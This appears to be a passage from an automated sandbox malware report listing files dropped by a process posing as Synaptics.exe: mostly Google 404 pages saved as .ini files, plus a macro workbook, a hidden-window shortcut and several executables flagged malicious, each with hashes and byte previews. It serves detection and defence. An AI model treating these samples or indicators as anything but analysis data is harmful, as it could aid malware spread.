                                                                                                                                                                                                                          SHA1:AACB402DE6CA661E9346EDBAF8E25E0668E71B85
                                                                                                                                                                                                                          SHA-256:7DD1E65FD2E54204988F375A511A39CA731E409D5BC85FC3D522A7CBD5C6C82B
                                                                                                                                                                                                                          SHA-512:D9F4D96A8ACE8C4B514366AAE9F9D8605BFDFD3FBA2747F24B9BC93D44D9FD16894D44DCBA84CC4E279AF63DFE09523BD30942E1A06FD3A5EB64B0F510F08A69
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JjyestReKDUHk4mbM1FZow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\KrD7UxG.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.266186102482499
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0VbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:951AF258DBAE8260C49BB520432A78DE
                                                                                                                                                                                                                          SHA1:016D5366299873206982A115616B35A7F5F7C077
                                                                                                                                                                                                                          SHA-256:5CFB033F81E0E29DDB3AD643CF1E51C48379648953DFC6C95815F8DBCA01ACFC
                                                                                                                                                                                                                          SHA-512:18E5B34B61B754A5D67F36D53529A4F5BC1350B2307E40AA96E00768257448158BA3E2ACF331B85D92C8E3222C52D4CD5271CD6F4CBFCDD894178960BA618D82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8SxTRSHiweffjsq6nN3KTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\MTLdFLE.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.266280444801442
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0QDUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+u+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:73B8E5C9530F9B089BDC0E8BD4C55E82
                                                                                                                                                                                                                          SHA1:D0CE08FDA40B66BD46CA476A315F83A615EDF44B
                                                                                                                                                                                                                          SHA-256:910FD2969B0D31D04CE0D720A60310FC30E0397A73516D079CA3D32949FBEC2B
                                                                                                                                                                                                                          SHA-512:7A93F0FB3987222C12E9377F3E5697B4B63289C27DA6099361100B161C100A398AFA634F233D42E84DC0C74042043BA2A9A281D5A3D2F4EA0DE49A82C0EC9024
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wP5qirZj-ZZ4GN_JY-qUBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\NDyKofJ.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.264545281101612
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:1C68CB7AFAAC18F9B253C9BFAA1A4A77
                                                                                                                                                                                                                          SHA1:147297220FC5CD3DB80FB9DBFCEDBEF1F7AE957B
                                                                                                                                                                                                                          SHA-256:B0008F58F98D780737C82F7CB2AACB591AB45B2DA477920166465D49BF4F6B9B
                                                                                                                                                                                                                          SHA-512:FEA84EE5FA3D51E32322F74BE240DA3D808D5D2AE8EEC20E6CDB8531E5D34ED592C6A7FA4980F282ECD0EB88A317026797C2F8D8FCAE8FD445A58755D4EC4AF8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xLqjLAwnUTWVbmwCR3m4Dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\OBixP3cz.xlsm

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\QwRBqv2.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.256244874729158
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0dclISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+sclI+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:B552D4446D24C0E0360ABDA8E674FA5A
                                                                                                                                                                                                                          SHA1:88301C130D245EC9B011507B3AF2E12F2F3056DC
                                                                                                                                                                                                                          SHA-256:51B049D1E454DBC7329297F223F3F507F35BF1D72350C31B4604415576085D64
                                                                                                                                                                                                                          SHA-512:D68FCB0639B37DF5DCEC8AB31B72A28410A19D740BD919A2F962E96128E1494A5CD3B78BB066D38D8222E81ADB754635C661CB8A40653BE9F1C01B71DFC0BC7C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OZXwLsWdbx9tuEnwWvFN0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RCXDA77.tmp

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2262528
                                                                                                                                                                                                                          Entropy (8bit):7.489402973820276
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:onsHyjtk2MYC5GDqso5AJs+gYGh3JfEwVu4H:onsmtk2a/5AJJcEws4H
                                                                                                                                                                                                                          MD5:65B8E77E293A905F0AC7289E01DCB715
                                                                                                                                                                                                                          SHA1:C4326E7DE95466D022BFC4B79D5BC9CC3859DE84
                                                                                                                                                                                                                          SHA-256:0BC82DCB41571412B308716DB19E9F721A7A304B1BEE76A3B9AFB327B32612F8
                                                                                                                                                                                                                          SHA-512:167644568729A90BCD31F58D454D9C7182EB167EDE37C818BCC33665AE48249343AFA092937CE8D854D254C975DC98437268C8E51B0ED2C5E7C85A5F1F189108
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RCXF979.tmp

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2262528
                                                                                                                                                                                                                          Entropy (8bit):7.487265723978036
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:onsHyjtk2MYC5GDzso5AJs+gYGh3JfEwVu4H:onsmtk2aS5AJJcEws4H
                                                                                                                                                                                                                          MD5:FA4C249127C8D6D3661A369551570EB3
                                                                                                                                                                                                                          SHA1:BB1FAA2CD5C36DC224BF162B6C7D381F91A49431
                                                                                                                                                                                                                          SHA-256:4B7D1627FBFEFB6B1E47A2AF6E4EC95A542C219EACA1AEF57949FA76378D65A1
                                                                                                                                                                                                                          SHA-512:141F2CDE2F424B8883203463AC093B5789A6C2C2B359CA6CF54E9FA8068F91354CC6873DD885CDC92B60D524C9E9080A710036E39764F4931586F38599A32063
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\REi9Htc.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.27105939027754
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0oSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+n+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:DC79684C67DB88D6BDAD338CC8F33238
                                                                                                                                                                                                                          SHA1:FCC271B2BD3B132022BC39DA2AD5508BBBFD8D8C
                                                                                                                                                                                                                          SHA-256:7B3F6C53CDCE17EC2A2F675746B40DD04BC08651D883ECB1FA3A04D13B4D64D4
                                                                                                                                                                                                                          SHA-512:C5013F45A7B7528F396D55998106CDC8B85E2381928786449B80FA6FEB3E0DEB7F5802D97AF59A1D3CD93BF81A3407FB64CD963E4E0ED7E773C9B235D25EDE6F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WZVRGESBti0-bC3FHIppcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Stopes204.lnk

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                          Entropy (8bit):3.026195870563083
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:8wl0ksXou41w/tz+7RafgKDDAl2RW3MvW3ME3qQ18/3NJkKAd4t2Y+xIBjK:8jf4eaRMgKXOftHLS9HAv7aB
                                                                                                                                                                                                                          MD5:CC1F1A79320338AFABD0947DE0744BCD
                                                                                                                                                                                                                          SHA1:53780A426BE2BCA09043E5EEB1AEBC4651FAC0F6
                                                                                                                                                                                                                          SHA-256:2AE7C3D23C798A2CA5B95AE8957F0BF23A83E8613E165526986123500F69BCF3
                                                                                                                                                                                                                          SHA-512:78017EF850E40D49CE5C2B459CEB101E30647619EDD0F68E9A44B7E2EB098621B973A6514F474239C695565D42700ABED6C35A3BDCD4A5B3BA029E9BE29BA8AC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:L..................F........................................................7....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................h.a.r.d.z.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....t.2...........Dansehesten98.exe.T............................................D.a.n.s.e.h.e.s.t.e.n.9.8...e.x.e... .......\.D.a.n.s.e.h.e.s.t.e.n.9.8...e.x.e.!.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\U5UjEkM.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.255451488331643
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0ErSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+7+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:FD58B50DF74A98E3CE307B686FF10A1F
                                                                                                                                                                                                                          SHA1:3BB2373822783BB728FC46C377368116D3688DF3
                                                                                                                                                                                                                          SHA-256:358BB4E4BC103F18FE910C9AC6EA0475D278CE1AE607F939E366F32A98B348EB
                                                                                                                                                                                                                          SHA-512:29C5415E00C2C4F5B69DDA03DE1B5F5D53777CBD79685F1EBAADB79ABC6C46CE6CF5E704A06AC54C0883C1D1D1C3DA497ACCA5130E0263232937F2B0BD262E48
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IAtR19I5J4MsLp-m-Bw-7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\WGLMqHD.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2675017651506595
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0lSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+i+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:E2758FD1176B9AD6ED0FF37218FEEADD
                                                                                                                                                                                                                          SHA1:4398397BDD01476D7941382F3CF970E6E782BCBC
                                                                                                                                                                                                                          SHA-256:FB5FDF88CBA7C5609DB0C30E70BA6B04A91C37DCDB18F13522973BA79F89AE9A
                                                                                                                                                                                                                          SHA-512:EAD4FC74ADAF6D7BA72CCD5AA699569731C1BAB5603B859930D0130D73FF2C4F33CB972C95DED8299E7C97735063D2606D944EBD6E339F88BF6255DC161AEC31
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J_ccHA_UVVi8M5U2jH3eQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Y1lkYiF.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2583066645133645
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+01+jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+nj+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:4A3172B7B315A3184E83E3DA82A7A8F6
                                                                                                                                                                                                                          SHA1:CF4388AAE5812EC2C4125C7704665CDC897E3487
                                                                                                                                                                                                                          SHA-256:68E85F5B7F2E62C75DC638710D00678D2EF573BBCCB33786A1112D0C870D0658
                                                                                                                                                                                                                          SHA-512:E0189983E9A27DA0301D724B185D72C08898900CB7E1B4B0A0E33629F320A44106C0D523E5B9F55CBBDDAF0229EA783CD949E7E248658647FBFF91A979E07A93
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9nfiIg4R6U_M1dwLTw7FyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                                                                          Entropy (8bit):6.644060003425038
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                                                          MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                                                          SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                                                          SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\YC9w8Aif.ico

                                                                                                                                                                                                                          Download File
